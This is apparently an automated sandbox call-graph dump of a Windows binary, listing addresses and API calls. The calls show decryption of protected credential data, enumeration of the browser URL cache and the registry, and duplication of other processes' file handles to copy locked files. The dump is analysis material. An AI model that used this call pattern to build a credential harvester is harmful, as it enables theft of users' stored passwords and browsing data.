38250 40ea90 38249->38250 38251 40aa04 free 38250->38251 38252 40ea98 38251->38252 38253 40aa04 free 38252->38253 38254 40eaa0 38253->38254 38255 40a9ce 4 API calls 38254->38255 38256 40eab3 38255->38256 38257 40a9ce 4 API calls 38256->38257 38258 40eabd 38257->38258 38259 40a9ce 4 API calls 38258->38259 38260 40eac7 38259->38260 38261 40a9ce 4 API calls 38260->38261 38262 40ead1 38261->38262 38262->38235 38263->38194 38264->38198 38322 40b2cc 38265->38322 38267 402b0a 38268 40b2cc 27 API calls 38267->38268 38269 402b23 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402b3a 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402b54 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402b6b 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402b82 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402b99 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402bb0 38280->38281 38282 40b2cc 27 API calls 38281->38282 38283 402bc7 38282->38283 38284 40b2cc 27 API calls 38283->38284 38285 402bde 38284->38285 38286 40b2cc 27 API calls 38285->38286 38287 402bf5 38286->38287 38288 40b2cc 27 API calls 38287->38288 38289 402c0c 38288->38289 38290 40b2cc 27 API calls 38289->38290 38291 402c23 38290->38291 38292 40b2cc 27 API calls 38291->38292 38293 402c3a 38292->38293 38294 40b2cc 27 API calls 38293->38294 38295 402c51 38294->38295 38296 40b2cc 27 API calls 38295->38296 38297 402c68 38296->38297 38298 40b2cc 27 API calls 38297->38298 38299 402c7f 38298->38299 38300 40b2cc 27 API calls 38299->38300 38301 402c99 38300->38301 38302 40b2cc 27 API calls 38301->38302 38303 402cb3 38302->38303 38304 40b2cc 27 API calls 38303->38304 38305 402cd5 38304->38305 38306 40b2cc 27 API calls 38305->38306 38307 402cf0 38306->38307 38308 40b2cc 27 API calls 38307->38308 38309 402d0b 38308->38309 38310 40b2cc 27 API calls 38309->38310 38311 402d26 38310->38311 38312 40b2cc 27 API calls 38311->38312 38313 402d3e 38312->38313 38314 40b2cc 27 API calls 38313->38314 38315 402d59 38314->38315 38316 40b2cc 27 API calls 38315->38316 38317 402d78 38316->38317 38318 40b2cc 27 API calls 38317->38318 38319 402d93 38318->38319 38320 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38319->38320 38320->38202 38321->38192 38325 40b58d 38322->38325 38324 40b2d1 38324->38267 38326 40b5a4 GetModuleHandleW FindResourceW 38325->38326 38327 40b62e 38325->38327 38328 40b5c2 LoadResource 38326->38328 38330 40b5e7 38326->38330 38327->38324 38329 40b5d0 SizeofResource LockResource 38328->38329 38328->38330 38329->38330 38330->38327 38338 40afcf 38330->38338 38332 40b608 memcpy 38341 40b4d3 memcpy 38332->38341 38334 40b61e 38342 40b3c1 18 API calls 38334->38342 38336 40b626 38343 40b04b 38336->38343 38339 40b04b ??3@YAXPAX 38338->38339 38340 40afd7 ??2@YAPAXI 38339->38340 38340->38332 38341->38334 38342->38336 38344 40b051 ??3@YAXPAX 38343->38344 38345 40b05f 38343->38345 38344->38345 38345->38327 38346->38210 38348 4032c4 38347->38348 38349 40b633 free 38348->38349 38350 403316 38349->38350 38369 44553b 38350->38369 38354 403480 38567 40368c 15 API calls 38354->38567 38356 403489 38357 40b633 free 38356->38357 38359 403495 38357->38359 38358 40333c 38358->38354 38360 4033a9 memset memcpy 38358->38360 38361 4033ec wcscmp 38358->38361 38565 4028e7 11 API calls 38358->38565 38566 40f508 6 API calls 38358->38566 38359->38212 38360->38358 38360->38361 38361->38358 38363 403421 _wcsicmp 38363->38358 38366 444a64 FreeLibrary 38365->38366 38367 444a83 38365->38367 38366->38367 38367->38212 38368->38213 38370 445548 38369->38370 38371 445599 38370->38371 38568 40c768 38370->38568 38372 4455a8 memset 38371->38372 38514 4457f2 38371->38514 38652 403988 38372->38652 38378 4455e5 38387 445672 38378->38387 38397 44560f 38378->38397 38380 4458bb memset memset 38384 414c2e 16 API calls 38380->38384 38382 4459ed 38388 445a00 memset memset 38382->38388 38389 445b22 38382->38389 38383 44595e memset memset 38390 414c2e 16 API calls 38383->38390 38391 4458f9 38384->38391 38385 44557a 38392 44558c 38385->38392 38632 4136c0 38385->38632 38663 403fbe memset memset memset memset memset 38387->38663 38394 414c2e 16 API calls 38388->38394 38399 445bca 38389->38399 38400 445b38 memset memset memset 38389->38400 38395 44599c 38390->38395 38396 40b2cc 27 API calls 38391->38396 38636 444b06 38392->38636 38404 445a3e 38394->38404 38406 40b2cc 27 API calls 38395->38406 38407 445909 38396->38407 38409 4087b3 335 API calls 38397->38409 38408 445c8b memset memset 38399->38408 38465 445cf0 38399->38465 38412 445bd4 38400->38412 38413 445b98 38400->38413 38401 445849 38846 40b1ab free free 38401->38846 38414 40b2cc 27 API calls 38404->38414 38422 4459ac 38406->38422 38418 409d1f 6 API calls 38407->38418 38423 414c2e 16 API calls 38408->38423 38419 445621 38409->38419 38411 44589f 38847 40b1ab free free 38411->38847 38801 414c2e 38412->38801 38413->38412 38425 445ba2 38413->38425 38427 445a4f 38414->38427 38417 403335 38564 4452e5 43 API calls 38417->38564 38433 445919 38418->38433 38832 4454bf 20 API calls 38419->38832 38420 445823 38420->38401 38442 4087b3 335 API calls 38420->38442 38421 445854 38428 4458aa 38421->38428 38778 403c9c memset memset memset memset memset 38421->38778 38434 409d1f 6 API calls 38422->38434 38435 445cc9 38423->38435 38937 4099c6 wcslen 38425->38937 38426 4456b2 38834 40b1ab free free 38426->38834 38439 409d1f 6 API calls 38427->38439 38428->38380 38461 44594a 38428->38461 38431 445d3d 38460 40b2cc 27 API calls 38431->38460 38432 445d88 memset memset memset 38443 414c2e 16 API calls 38432->38443 38848 409b98 GetFileAttributesW 38433->38848 38444 4459bc 38434->38444 38445 409d1f 6 API calls 38435->38445 38436 445879 38436->38411 38455 4087b3 335 API calls 38436->38455 38438 445680 38438->38426 38686 4087b3 memset 38438->38686 38448 445a63 38439->38448 38440 40b2cc 27 API calls 38449 445bf3 38440->38449 38442->38420 38452 445dde 38443->38452 38913 409b98 GetFileAttributesW 38444->38913 38454 445ce1 38445->38454 38446 445bb3 38940 445403 memset 38446->38940 38458 40b2cc 27 API calls 38448->38458 38817 409d1f wcslen wcslen 38449->38817 38450 445928 38450->38461 38849 40b6ef 38450->38849 38462 40b2cc 27 API calls 38452->38462 38957 409b98 GetFileAttributesW 38454->38957 38455->38436 38467 445a94 38458->38467 38470 445d54 _wcsicmp 38460->38470 38461->38382 38461->38383 38473 445def 38462->38473 38463 4459cb 38463->38382 38480 40b6ef 249 API calls 38463->38480 38465->38417 38465->38431 38465->38432 38466 445389 255 API calls 38466->38399 38914 40ae18 38467->38914 38468 44566d 38468->38514 38737 413d4c 38468->38737 38477 445d71 38470->38477 38541 445d67 38470->38541 38472 445665 38833 40b1ab free free 38472->38833 38478 409d1f 6 API calls 38473->38478 38958 445093 23 API calls 38477->38958 38485 445e03 38478->38485 38480->38382 38481 4456d8 38487 40b2cc 27 API calls 38481->38487 38484 44563c 38484->38472 38490 4087b3 335 API calls 38484->38490 38959 409b98 GetFileAttributesW 38485->38959 38486 40b6ef 249 API calls 38486->38417 38492 4456e2 38487->38492 38488 40b2cc 27 API calls 38493 445c23 38488->38493 38489 445d83 38489->38417 38490->38484 38835 413fa6 _wcsicmp _wcsicmp 38492->38835 38497 409d1f 6 API calls 38493->38497 38495 445e12 38501 445e6b 38495->38501 38508 40b2cc 27 API calls 38495->38508 38499 445c37 38497->38499 38498 4456eb 38504 4456fd memset memset memset memset 38498->38504 38505 4457ea 38498->38505 38506 445389 255 API calls 38499->38506 38500 445b17 38934 40aebe 38500->38934 38961 445093 23 API calls 38501->38961 38836 409c70 wcscpy wcsrchr 38504->38836 38839 413d29 38505->38839 38512 445c47 38506->38512 38513 445e33 38508->38513 38510 445e7e 38515 445f67 38510->38515 38518 40b2cc 27 API calls 38512->38518 38519 409d1f 6 API calls 38513->38519 38514->38421 38755 403e2d memset memset memset memset memset 38514->38755 38521 40b2cc 27 API calls 38515->38521 38516 445ab2 memset 38522 40b2cc 27 API calls 38516->38522 38524 445c53 38518->38524 38520 445e47 38519->38520 38960 409b98 GetFileAttributesW 38520->38960 38526 445f73 38521->38526 38527 445aa1 38522->38527 38523 409c70 2 API calls 38528 44577e 38523->38528 38529 409d1f 6 API calls 38524->38529 38531 409d1f 6 API calls 38526->38531 38527->38500 38527->38516 38532 409d1f 6 API calls 38527->38532 38540 445389 255 API calls 38527->38540 38921 40add4 38527->38921 38926 40ae51 38527->38926 38533 409c70 2 API calls 38528->38533 38534 445c67 38529->38534 38530 445e56 38530->38501 38538 445e83 memset 38530->38538 38535 445f87 38531->38535 38532->38527 38536 44578d 38533->38536 38537 445389 255 API calls 38534->38537 38964 409b98 GetFileAttributesW 38535->38964 38536->38505 38543 40b2cc 27 API calls 38536->38543 38537->38399 38542 40b2cc 27 API calls 38538->38542 38540->38527 38541->38417 38541->38486 38544 445eab 38542->38544 38545 4457a8 38543->38545 38546 409d1f 6 API calls 38544->38546 38547 409d1f 6 API calls 38545->38547 38548 445ebf 38546->38548 38549 4457b8 38547->38549 38550 40ae18 9 API calls 38548->38550 38838 409b98 GetFileAttributesW 38549->38838 38560 445ef5 38550->38560 38552 4457c7 38552->38505 38554 4087b3 335 API calls 38552->38554 38553 40ae51 9 API calls 38553->38560 38554->38505 38555 445f5c 38557 40aebe FindClose 38555->38557 38556 40add4 2 API calls 38556->38560 38557->38515 38558 40b2cc 27 API calls 38558->38560 38559 409d1f 6 API calls 38559->38560 38560->38553 38560->38555 38560->38556 38560->38558 38560->38559 38562 445f3a 38560->38562 38962 409b98 GetFileAttributesW 38560->38962 38963 445093 23 API calls 38562->38963 38564->38358 38565->38363 38566->38358 38567->38356 38569 40c775 38568->38569 38965 40b1ab free free 38569->38965 38571 40c788 38966 40b1ab free free 38571->38966 38573 40c790 38967 40b1ab free free 38573->38967 38575 40c798 38576 40aa04 free 38575->38576 38577 40c7a0 38576->38577 38968 40c274 memset 38577->38968 38582 40a8ab 9 API calls 38583 40c7c3 38582->38583 38584 40a8ab 9 API calls 38583->38584 38585 40c7d0 38584->38585 38997 40c3c3 38585->38997 38589 40c877 38598 40bdb0 38589->38598 38590 40c86c 39025 4053fe 37 API calls 38590->39025 38593 40c813 _wcslwr 39023 40c634 47 API calls 38593->39023 38595 40c829 wcslen 38596 40c7e5 38595->38596 38596->38589 38596->38590 39022 40a706 wcslen memcpy 38596->39022 39024 40c634 47 API calls 38596->39024 39159 404363 38598->39159 38603 40b2cc 27 API calls 38604 40be02 wcslen 38603->38604 38605 40bf5d 38604->38605 38613 40be1e 38604->38613 39176 40440c 38605->39176 38606 40be26 wcsncmp 38606->38613 38609 40be7d memset 38610 40bea7 memcpy 38609->38610 38609->38613 38611 40bf11 wcschr 38610->38611 38610->38613 38611->38613 38612 40b2cc 27 API calls 38614 40bef6 _wcsnicmp 38612->38614 38613->38605 38613->38606 38613->38609 38613->38610 38613->38611 38613->38612 38615 40bf43 LocalFree 38613->38615 39179 40bd5d 28 API calls 38613->39179 39180 404423 38613->39180 38614->38611 38614->38613 38615->38613 38616 4135f7 39192 4135e0 38616->39192 38619 40b2cc 27 API calls 38620 41360d 38619->38620 38621 40a804 8 API calls 38620->38621 38622 413613 38621->38622 38623 41363e 38622->38623 38625 40b273 27 API calls 38622->38625 38624 4135e0 FreeLibrary 38623->38624 38626 413643 38624->38626 38627 413625 38625->38627 38626->38385 38627->38623 38628 413648 38627->38628 38629 413658 38628->38629 38630 4135e0 FreeLibrary 38628->38630 38629->38385 38631 413666 38630->38631 38631->38385 38634 4136e2 38632->38634 38633 413827 38831 41366b FreeLibrary 38633->38831 38634->38633 38635 4137ac CoTaskMemFree 38634->38635 38635->38634 39195 4449b9 38636->39195 38639 444c1f 38639->38371 38640 4449b9 35 API calls 38642 444b4b 38640->38642 38641 444c15 38644 4449b9 35 API calls 38641->38644 38642->38641 39215 444972 GetVersionExW 38642->39215 38644->38639 38645 444b99 memcmp 38649 444b8c 38645->38649 38646 444c0b 39219 444a85 35 API calls 38646->39219 38649->38645 38649->38646 39216 444aa5 35 API calls 38649->39216 39217 40a7a0 GetVersionExW 38649->39217 39218 444a85 35 API calls 38649->39218 38653 40399d 38652->38653 39220 403a16 38653->39220 38655 403a09 39234 40b1ab free free 38655->39234 38657 403a12 wcsrchr 38657->38378 38658 4039a3 38658->38655 38661 4039f4 38658->38661 39231 40a02c CreateFileW 38658->39231 38661->38655 38662 4099c6 2 API calls 38661->38662 38662->38655 38664 414c2e 16 API calls 38663->38664 38665 404048 38664->38665 38666 414c2e 16 API calls 38665->38666 38667 404056 38666->38667 38668 409d1f 6 API calls 38667->38668 38669 404073 38668->38669 38670 409d1f 6 API calls 38669->38670 38671 40408e 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 4040a6 38672->38673 38674 403af5 20 API calls 38673->38674 38675 4040ba 38674->38675 38676 403af5 20 API calls 38675->38676 38677 4040cb 38676->38677 39261 40414f memset 38677->39261 38679 4040e0 38680 404140 38679->38680 38682 4040ec memset 38679->38682 38684 4099c6 2 API calls 38679->38684 38685 40a8ab 9 API calls 38679->38685 39275 40b1ab free free 38680->39275 38682->38679 38683 404148 38683->38438 38684->38679 38685->38679 39288 40a6e6 WideCharToMultiByte 38686->39288 38688 4087ed 39289 4095d9 memset 38688->39289 38691 408809 memset memset memset memset memset 38692 40b2cc 27 API calls 38691->38692 38693 4088a1 38692->38693 38694 409d1f 6 API calls 38693->38694 38695 4088b1 38694->38695 38696 40b2cc 27 API calls 38695->38696 38697 4088c0 38696->38697 38698 409d1f 6 API calls 38697->38698 38699 4088d0 38698->38699 38700 40b2cc 27 API calls 38699->38700 38701 4088df 38700->38701 38702 409d1f 6 API calls 38701->38702 38703 4088ef 38702->38703 38704 40b2cc 27 API calls 38703->38704 38705 4088fe 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 40890e 38706->38707 38708 40b2cc 27 API calls 38707->38708 38709 40891d 38708->38709 38710 409d1f 6 API calls 38709->38710 38711 40892d 38710->38711 39306 409b98 GetFileAttributesW 38711->39306 38713 40893e 38714 408943 38713->38714 38723 408953 38723->38438 38738 40b633 free 38737->38738 38739 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38738->38739 38740 413f00 Process32NextW 38739->38740 38741 413da5 OpenProcess 38740->38741 38742 413f17 CloseHandle 38740->38742 38743 413df3 memset 38741->38743 38746 413eb0 38741->38746 38742->38481 39338 413f27 38743->39338 38745 413ebf free 38745->38746 38746->38740 38746->38745 38747 4099f4 3 API calls 38746->38747 38747->38746 38748 413e37 GetModuleHandleW 38750 413e46 38748->38750 38752 413e1f 38748->38752 38750->38752 38751 413e6a QueryFullProcessImageNameW 38751->38752 38752->38748 38752->38751 39343 413959 38752->39343 39359 413ca4 38752->39359 38754 413ea2 CloseHandle 38754->38746 38756 414c2e 16 API calls 38755->38756 38757 403eb7 38756->38757 38758 414c2e 16 API calls 38757->38758 38759 403ec5 38758->38759 38760 409d1f 6 API calls 38759->38760 38761 403ee2 38760->38761 38762 409d1f 6 API calls 38761->38762 38763 403efd 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 403f15 38764->38765 38766 403af5 20 API calls 38765->38766 38767 403f29 38766->38767 38768 403af5 20 API calls 38767->38768 38769 403f3a 38768->38769 38770 40414f 33 API calls 38769->38770 38776 403f4f 38770->38776 38771 403faf 39372 40b1ab free free 38771->39372 38772 403f5b memset 38772->38776 38774 403fb7 38774->38420 38775 4099c6 2 API calls 38775->38776 38776->38771 38776->38772 38776->38775 38777 40a8ab 9 API calls 38776->38777 38777->38776 38779 414c2e 16 API calls 38778->38779 38780 403d26 38779->38780 38781 414c2e 16 API calls 38780->38781 38782 403d34 38781->38782 38783 409d1f 6 API calls 38782->38783 38784 403d51 38783->38784 38785 409d1f 6 API calls 38784->38785 38786 403d6c 38785->38786 38787 409d1f 6 API calls 38786->38787 38788 403d84 38787->38788 38789 403af5 20 API calls 38788->38789 38790 403d98 38789->38790 38791 403af5 20 API calls 38790->38791 38792 403da9 38791->38792 38793 40414f 33 API calls 38792->38793 38799 403dbe 38793->38799 38794 403e1e 39373 40b1ab free free 38794->39373 38795 403dca memset 38795->38799 38797 403e26 38797->38436 38798 4099c6 2 API calls 38798->38799 38799->38794 38799->38795 38799->38798 38800 40a8ab 9 API calls 38799->38800 38800->38799 38802 414b81 8 API calls 38801->38802 38803 414c40 38802->38803 38804 414c73 memset 38803->38804 39374 409cea 38803->39374 38806 414c94 38804->38806 39377 414592 RegOpenKeyExW 38806->39377 38808 414c64 SHGetSpecialFolderPathW 38810 414d0b 38808->38810 38810->38440 38811 414cc1 38812 414cf4 wcscpy 38811->38812 39378 414bb0 wcscpy 38811->39378 38812->38810 38814 414cd2 39379 4145ac RegQueryValueExW 38814->39379 38816 414ce9 RegCloseKey 38816->38812 38818 409d62 38817->38818 38819 409d43 wcscpy 38817->38819 38822 445389 38818->38822 38820 409719 2 API calls 38819->38820 38821 409d51 wcscat 38820->38821 38821->38818 38823 40ae18 9 API calls 38822->38823 38824 4453c4 38823->38824 38825 40ae51 9 API calls 38824->38825 38826 4453f3 38824->38826 38827 40add4 2 API calls 38824->38827 38830 445403 250 API calls 38824->38830 38825->38824 38828 40aebe FindClose 38826->38828 38827->38824 38829 4453fe 38828->38829 38829->38488 38830->38824 38831->38392 38832->38484 38833->38468 38834->38468 38835->38498 38837 409c89 38836->38837 38837->38523 38838->38552 38840 413d39 38839->38840 38841 413d2f FreeLibrary 38839->38841 38842 40b633 free 38840->38842 38841->38840 38843 413d42 38842->38843 38844 40b633 free 38843->38844 38845 413d4a 38844->38845 38845->38514 38846->38421 38847->38428 38848->38450 38850 44db70 38849->38850 38851 40b6fc memset 38850->38851 38852 409c70 2 API calls 38851->38852 38853 40b732 wcsrchr 38852->38853 38854 40b743 38853->38854 38855 40b746 memset 38853->38855 38854->38855 38856 40b2cc 27 API calls 38855->38856 38857 40b76f 38856->38857 38858 409d1f 6 API calls 38857->38858 38859 40b783 38858->38859 39380 409b98 GetFileAttributesW 38859->39380 38861 40b792 38863 409c70 2 API calls 38861->38863 38875 40b7c2 38861->38875 38865 40b7a5 38863->38865 38868 40b2cc 27 API calls 38865->38868 38866 40b837 CloseHandle 38870 40b83e memset 38866->38870 38867 40b817 39464 409a45 GetTempPathW 38867->39464 38871 40b7b2 38868->38871 39414 40a6e6 WideCharToMultiByte 38870->39414 38872 409d1f 6 API calls 38871->38872 38872->38875 38873 40b827 38873->38870 39381 40bb98 38875->39381 38876 40b866 39415 444432 38876->39415 38879 40bad5 38882 40b04b ??3@YAXPAX 38879->38882 38880 40b273 27 API calls 38881 40b89a 38880->38881 39461 438552 38881->39461 38884 40baf3 38882->38884 38884->38461 38886 40bacd 39495 443d90 110 API calls 38886->39495 38889 40bac6 39494 424f26 122 API calls 38889->39494 38890 40b8bd memset 39485 425413 17 API calls 38890->39485 38893 425413 17 API calls 38911 40b8b8 38893->38911 38896 40a71b MultiByteToWideChar 38896->38911 38897 40a734 MultiByteToWideChar 38897->38911 38900 40b9b5 memcmp 38900->38911 38901 4099c6 2 API calls 38901->38911 38902 404423 37 API calls 38902->38911 38905 4251c4 136 API calls 38905->38911 38906 40bb3e memset memcpy 39496 40a734 MultiByteToWideChar 38906->39496 38908 40bb88 LocalFree 38908->38911 38911->38889 38911->38890 38911->38893 38911->38896 38911->38897 38911->38900 38911->38901 38911->38902 38911->38905 38911->38906 38912 40ba5f memcmp 38911->38912 39486 4253ef 16 API calls 38911->39486 39487 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38911->39487 39488 4253af 17 API calls 38911->39488 39489 4253cf 17 API calls 38911->39489 39490 447280 memset 38911->39490 39491 447960 memset memcpy memcpy memcpy 38911->39491 39492 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38911->39492 39493 447920 memcpy memcpy memcpy 38911->39493 38912->38911 38913->38463 38915 40aebe FindClose 38914->38915 38916 40ae21 38915->38916 38917 4099c6 2 API calls 38916->38917 38918 40ae35 38917->38918 38919 409d1f 6 API calls 38918->38919 38920 40ae49 38919->38920 38920->38527 38922 40ade0 38921->38922 38923 40ae0f 38921->38923 38922->38923 38924 40ade7 wcscmp 38922->38924 38923->38527 38924->38923 38925 40adfe wcscmp 38924->38925 38925->38923 38927 40ae7b FindNextFileW 38926->38927 38928 40ae5c FindFirstFileW 38926->38928 38929 40ae94 38927->38929 38930 40ae8f 38927->38930 38928->38929 38932 40aeb6 38929->38932 38933 409d1f 6 API calls 38929->38933 38931 40aebe FindClose 38930->38931 38931->38929 38932->38527 38933->38932 38935 40aed1 38934->38935 38936 40aec7 FindClose 38934->38936 38935->38389 38936->38935 38938 4099d7 38937->38938 38939 4099da memcpy 38937->38939 38938->38939 38939->38446 38941 40b2cc 27 API calls 38940->38941 38942 44543f 38941->38942 38943 409d1f 6 API calls 38942->38943 38944 44544f 38943->38944 39843 409b98 GetFileAttributesW 38944->39843 38946 44545e 38947 445476 38946->38947 38948 40b6ef 249 API calls 38946->38948 38949 40b2cc 27 API calls 38947->38949 38948->38947 38950 445482 38949->38950 38951 409d1f 6 API calls 38950->38951 38952 445492 38951->38952 39844 409b98 GetFileAttributesW 38952->39844 38954 4454a1 38955 4454b9 38954->38955 38956 40b6ef 249 API calls 38954->38956 38955->38466 38956->38955 38957->38465 38958->38489 38959->38495 38960->38530 38961->38510 38962->38560 38963->38560 38964->38541 38965->38571 38966->38573 38967->38575 38969 414c2e 16 API calls 38968->38969 38970 40c2ae 38969->38970 39026 40c1d3 38970->39026 38975 40c3be 38992 40a8ab 38975->38992 38976 40afcf 2 API calls 38977 40c2fd FindFirstUrlCacheEntryW 38976->38977 38978 40c3b6 38977->38978 38979 40c31e wcschr 38977->38979 38980 40b04b ??3@YAXPAX 38978->38980 38981 40c331 38979->38981 38982 40c35e FindNextUrlCacheEntryW 38979->38982 38980->38975 38984 40a8ab 9 API calls 38981->38984 38982->38979 38983 40c373 GetLastError 38982->38983 38985 40c3ad FindCloseUrlCache 38983->38985 38986 40c37e 38983->38986 38987 40c33e wcschr 38984->38987 38985->38978 38988 40afcf 2 API calls 38986->38988 38987->38982 38989 40c34f 38987->38989 38990 40c391 FindNextUrlCacheEntryW 38988->38990 38991 40a8ab 9 API calls 38989->38991 38990->38979 38990->38985 38991->38982 39120 40a97a 38992->39120 38995 40a8cc 38995->38582 38996 40a8d0 7 API calls 38996->38995 39125 40b1ab free free 38997->39125 38999 40c3dd 39000 40b2cc 27 API calls 38999->39000 39001 40c3e7 39000->39001 39126 414592 RegOpenKeyExW 39001->39126 39003 40c3f4 39004 40c50e 39003->39004 39005 40c3ff 39003->39005 39019 405337 39004->39019 39006 40a9ce 4 API calls 39005->39006 39007 40c418 memset 39006->39007 39127 40aa1d 39007->39127 39010 40c471 39012 40c47a _wcsupr 39010->39012 39011 40c505 RegCloseKey 39011->39004 39013 40a8d0 7 API calls 39012->39013 39014 40c498 39013->39014 39015 40a8d0 7 API calls 39014->39015 39016 40c4ac memset 39015->39016 39017 40aa1d 39016->39017 39018 40c4e4 RegEnumValueW 39017->39018 39018->39011 39018->39012 39129 405220 39019->39129 39021 405340 39021->38596 39022->38593 39023->38595 39024->38596 39025->38589 39027 40ae18 9 API calls 39026->39027 39033 40c210 39027->39033 39028 40ae51 9 API calls 39028->39033 39029 40c264 39030 40aebe FindClose 39029->39030 39032 40c26f 39030->39032 39031 40add4 2 API calls 39031->39033 39038 40e5ed memset memset 39032->39038 39033->39028 39033->39029 39033->39031 39034 40c231 _wcsicmp 39033->39034 39035 40c1d3 34 API calls 39033->39035 39034->39033 39036 40c248 39034->39036 39035->39033 39051 40c084 21 API calls 39036->39051 39039 414c2e 16 API calls 39038->39039 39040 40e63f 39039->39040 39041 409d1f 6 API calls 39040->39041 39042 40e658 39041->39042 39052 409b98 GetFileAttributesW 39042->39052 39044 40e667 39045 409d1f 6 API calls 39044->39045 39047 40e680 39044->39047 39045->39047 39053 409b98 GetFileAttributesW 39047->39053 39048 40e68f 39049 40c2d8 39048->39049 39054 40e4b2 39048->39054 39049->38975 39049->38976 39051->39033 39052->39044 39053->39048 39075 40e01e 39054->39075 39056 40e593 39057 40e5b0 39056->39057 39058 40e59c DeleteFileW 39056->39058 39059 40b04b ??3@YAXPAX 39057->39059 39058->39057 39061 40e5bb 39059->39061 39060 40e521 39060->39056 39098 40e175 39060->39098 39063 40e5c4 CloseHandle 39061->39063 39064 40e5cc 39061->39064 39063->39064 39066 40b633 free 39064->39066 39065 40e573 39067 40e584 39065->39067 39068 40e57c CloseHandle 39065->39068 39069 40e5db 39066->39069 39119 40b1ab free free 39067->39119 39068->39067 39070 40b633 free 39069->39070 39072 40e5e3 39070->39072 39072->39049 39074 40e540 39074->39065 39118 40e2ab 30 API calls 39074->39118 39076 406214 22 API calls 39075->39076 39077 40e03c 39076->39077 39078 40e16b 39077->39078 39079 40dd85 60 API calls 39077->39079 39078->39060 39080 40e06b 39079->39080 39080->39078 39081 40afcf ??2@YAPAXI ??3@YAXPAX 39080->39081 39082 40e08d OpenProcess 39081->39082 39083 40e0a4 GetCurrentProcess DuplicateHandle 39082->39083 39087 40e152 39082->39087 39084 40e0d0 GetFileSize 39083->39084 39085 40e14a CloseHandle 39083->39085 39088 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39084->39088 39085->39087 39086 40e160 39090 40b04b ??3@YAXPAX 39086->39090 39087->39086 39089 406214 22 API calls 39087->39089 39091 40e0ea 39088->39091 39089->39086 39090->39078 39092 4096dc CreateFileW 39091->39092 39093 40e0f1 CreateFileMappingW 39092->39093 39094 40e140 CloseHandle CloseHandle 39093->39094 39095 40e10b MapViewOfFile 39093->39095 39094->39085 39096 40e13b CloseHandle 39095->39096 39097 40e11f WriteFile UnmapViewOfFile 39095->39097 39096->39094 39097->39096 39099 40e18c 39098->39099 39100 406b90 11 API calls 39099->39100 39101 40e19f 39100->39101 39102 40e1a7 memset 39101->39102 39103 40e299 39101->39103 39108 40e1e8 39102->39108 39104 4069a3 ??3@YAXPAX free 39103->39104 39105 40e2a4 39104->39105 39105->39074 39106 406e8f 13 API calls 39106->39108 39107 406b53 SetFilePointerEx ReadFile 39107->39108 39108->39106 39108->39107 39109 40dd50 _wcsicmp 39108->39109 39110 40e283 39108->39110 39114 40742e 8 API calls 39108->39114 39115 40aae3 wcslen wcslen _memicmp 39108->39115 39116 40e244 _snwprintf 39108->39116 39109->39108 39111 40e291 39110->39111 39112 40e288 free 39110->39112 39113 40aa04 free 39111->39113 39112->39111 39113->39103 39114->39108 39115->39108 39117 40a8d0 7 API calls 39116->39117 39117->39108 39118->39074 39119->39056 39122 40a980 39120->39122 39121 40a8bb 39121->38995 39121->38996 39122->39121 39123 40a995 _wcsicmp 39122->39123 39124 40a99c wcscmp 39122->39124 39123->39122 39124->39122 39125->38999 39126->39003 39128 40aa23 RegEnumValueW 39127->39128 39128->39010 39128->39011 39130 40522a 39129->39130 39155 405329 39129->39155 39131 40b2cc 27 API calls 39130->39131 39132 405234 39131->39132 39133 40a804 8 API calls 39132->39133 39134 40523a 39133->39134 39156 40b273 39134->39156 39136 405248 _mbscpy _mbscat 39137 40526c 39136->39137 39138 40b273 27 API calls 39137->39138 39139 405279 39138->39139 39140 40b273 27 API calls 39139->39140 39141 40528f 39140->39141 39142 40b273 27 API calls 39141->39142 39143 4052a5 39142->39143 39144 40b273 27 API calls 39143->39144 39145 4052bb 39144->39145 39146 40b273 27 API calls 39145->39146 39147 4052d1 39146->39147 39148 40b273 27 API calls 39147->39148 39149 4052e7 39148->39149 39150 40b273 27 API calls 39149->39150 39151 4052fd 39150->39151 39152 40b273 27 API calls 39151->39152 39153 405313 39152->39153 39154 40b273 27 API calls 39153->39154 39154->39155 39155->39021 39157 40b58d 27 API calls 39156->39157 39158 40b18c 39157->39158 39158->39136 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 4043f7 39163->39164 39165 40b273 27 API calls 39163->39165 39164->38603 39164->38605 39166 40438d 39165->39166 39167 40b273 27 API calls 39166->39167 39168 4043a7 39167->39168 39169 40b273 27 API calls 39168->39169 39170 4043ba 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043ce 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043e2 39173->39174 39174->39164 39175 40440c FreeLibrary 39174->39175 39175->39164 39177 404413 FreeLibrary 39176->39177 39178 40441e 39176->39178 39177->39178 39178->38616 39179->38613 39181 40447e 39180->39181 39182 40442e 39180->39182 39183 404485 CryptUnprotectData 39181->39183 39184 40449c 39181->39184 39185 40b2cc 27 API calls 39182->39185 39183->39184 39184->38613 39186 404438 39185->39186 39187 40a804 8 API calls 39186->39187 39188 40443e 39187->39188 39189 40444f 39188->39189 39190 40b273 27 API calls 39188->39190 39189->39181 39191 404475 FreeLibrary 39189->39191 39190->39189 39191->39181 39193 4135f6 39192->39193 39194 4135eb FreeLibrary 39192->39194 39193->38619 39194->39193 39196 4449c4 39195->39196 39214 444a48 39195->39214 39197 40b2cc 27 API calls 39196->39197 39198 4449cb 39197->39198 39199 40a804 8 API calls 39198->39199 39200 4449d1 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4449dc 39201->39202 39203 40b273 27 API calls 39202->39203 39204 4449f3 39203->39204 39205 40b273 27 API calls 39204->39205 39206 444a04 39205->39206 39207 40b273 27 API calls 39206->39207 39208 444a15 39207->39208 39209 40b273 27 API calls 39208->39209 39210 444a26 39209->39210 39211 40b273 27 API calls 39210->39211 39212 444a37 39211->39212 39214->38639 